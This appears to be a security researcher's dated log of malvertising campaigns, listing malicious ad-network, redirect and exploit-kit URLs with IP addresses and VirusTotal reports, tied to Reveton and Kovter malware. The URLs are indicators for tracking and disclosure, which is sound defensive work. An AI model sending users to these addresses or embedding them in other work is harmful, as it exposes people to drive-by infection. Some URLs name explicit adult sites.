http://stiles-flooring.pw/tds/fr.php (199.168.136.213)
http://phee9ah.smart-stops.com:8000/bubmfp?soyldbxphkl=6061419

http://topblackcocks.net/ (99.192.172.5)
http://3502.vgj.puc.hku.fpnl.gebaiizx.podogey.in/?186a7d7e2a2a20292a367c7d74716e7d6a61366c6a797e7e717b7a6a77737d6a367b7775

(screenshots: malvert_floorings, topblackcocks.net)

EDIT – (TrafficHold Hack)

Targeting Germany:

http://cs.traffichold.com/www/delivery/afr.php?zoneid=109&cb=INSERT_RANDOM_NUMBER_HERE&wm=16495&pr=120843&prd=300x250&ts=failover&tsd=banner&prm=rev – 1 @ VT https://www.virustotal.com/fr/url/b7255c1144501908e7c4b76a855638e090c5b87d6e2ade110ab84e5b498ece37/analysis/1384796995/
http://download.jaysontaylor.net/pagead/show_ads.js
http://hurstbeech.1800etrade.com/e4le20i9wv

(screenshots: Reveton_jaysontaylor.net, Reveton_jaysontaylor.net2)

EDIT November 20 (TrafficHold Hack)

Still malvertising on traffichold.com; starting to believe it's crappy 🙂

http://free.gt-cv.com/pagead/show_ads.js
http://wellstea.ecuadoreasy.com/5g8tpk4obq

(screenshots: trafficholder, trafficholder2, trafficholder3)

EDIT – November 21 (TrafficHold Hack)

Traffichold.com malvertising still online.
All the top pages carry a 1px iframe; it looks like a hack.

I sent a message in a bottle; we'll see!

(screenshots: traffichold_malvertising_2111, traffichold_malvertising_2111_2)

EDIT – November 22 (Kovter Malvertising)

In the wild for the last few days; the same malvertising as the Kovter one in the past: http://www.malekal.com/2013/09/27/13323/

http://statistics.brandlinkserver.net:443 (192.200.125.120)
https://www.virustotal.com/fr/url/8fb3c20e5946a7430595ef843fed59568d8513b1a6c73be14ecc73221018d744/analysis/1385022540/

http://serv.emediatrust.com:443 (192.133.137.45)
https://www.virustotal.com/fr/url/94e5248b40367a050a8fe65d883a8f4a12841d27ab07f80060855f6580a18e1b/analysis/1385022599/

http://rpc.medialegator.net:443 (NO DNS)
https://www.virustotal.com/fr/url/cc4093030256d430ba4289e4ea408c311ce7d4bc42a3e0527220844c96860346/analysis/1385022638/

http://stats.rotationfactor.net:443 (192.200.125.118)
https://www.virustotal.com/fr/url/8fc96e60b85fedb413a301e8932fe237c2f3407ec5bbc7232a7a1870c0f2108a/analysis/1385022659/

http://serv.medialiteadv.com:443 (192.133.137.8)
https://www.virustotal.com/fr/url/8fb3c20e5946a7430595ef843fed59568d8513b1a6c73be14ecc73221018d744/analysis/1385022688/

http://serv.mindxmedia.net:443 (83.133.110.60)
https://www.virustotal.com/fr/url/b32d654de3d4be7da850c125faeb60a46837ce5571f9a6096da49274c963133a/analysis/1385022753/

http://serv.xmediahost.net:443 (192.133.137.49)
https://www.virustotal.com/fr/url/f6bbe5b2fb7200d1e8fb0903c858e08abd0bc12d629b6a8c0bfb3fb7d9963f26/analysis/1385037548/

(screenshots: Reveton_domain_pl, malvertising_pornoxo2)

EDIT November 24 (Group Goo.gl)

Still on judgeporn via jpspots.com again.
Same kind as the Bongacams group, the « goo.gl » group.

http://www.jpspots.com/sp/delivery/js.php?advplaces=19
http://smpnet.net/js/en/6/4198323baa/1385306360954/http:~~cdn.judgeporn.com~ads~r1.html/http:~~www.judgeporn.com~videos~angela-valentino-fills-her-mouth-with-a-huge-black-cock~/wpx07C/300x250.js – 1 @ VT https://www.virustotal.com/fr/url/e971285952ebf1bb3905317d8d7994fac7b7508f2d9a870b06ad3899c63859c1/analysis/1385308062/
http://blufonts.com/getfonts/user/2RhkV5/3324/sansation_400.font.js – 1 @ VT https://www.virustotal.com/fr/url/ed8611468f0905710c9c8a28b2885853acd98844e75a256a5cf9ca205c0eab36/analysis/1385308116/
http://blufonts.com/getfonts/user/2RhkV5/3324/cufon-yui.js
http://goo.gl:443
http://hoogschatte.cellbureaus.com/cwd9hsj489

~~

smpnet loads the xxfonts.com stuff.

(screenshots: malvertising_smpnet, malvertising_smpnet2)

The goo.gl iframe is built there; full JS: http://pastebin.com/RWnfry3w

(screenshots: malvertising_smpnet3, malvertising_smpnet4, malvertising_smpnet5)

EDIT (Hornyspots Malvertising)

http://delivery.hornyspots.com/?spot=53&track=69583&unique=0.48806754487283316
http://delivery.hornyspots.com/click.php?x=c8b6e207ca0e5125d70ddf37&r=hdteensexvideos.com&t=1385333457&s=53&c=661&m=438&track=69583
http://little-slut.com/ (69.64.43.212) – 2 @ VT https://www.virustotal.com/fr/url/3bd87026f299458d27754cbeccb5c8307e834ee5a5f555255ca9665aa7c0d30a/analysis/1385334082/
http://arresterahangwiegen.printabledigitalinvitations.com/05edg59cyg

http://urlquery.net/report.php?id=7952312

(screenshots: hornyspots_malvertising_reveton, hornyspots_malvertising_reveton2)
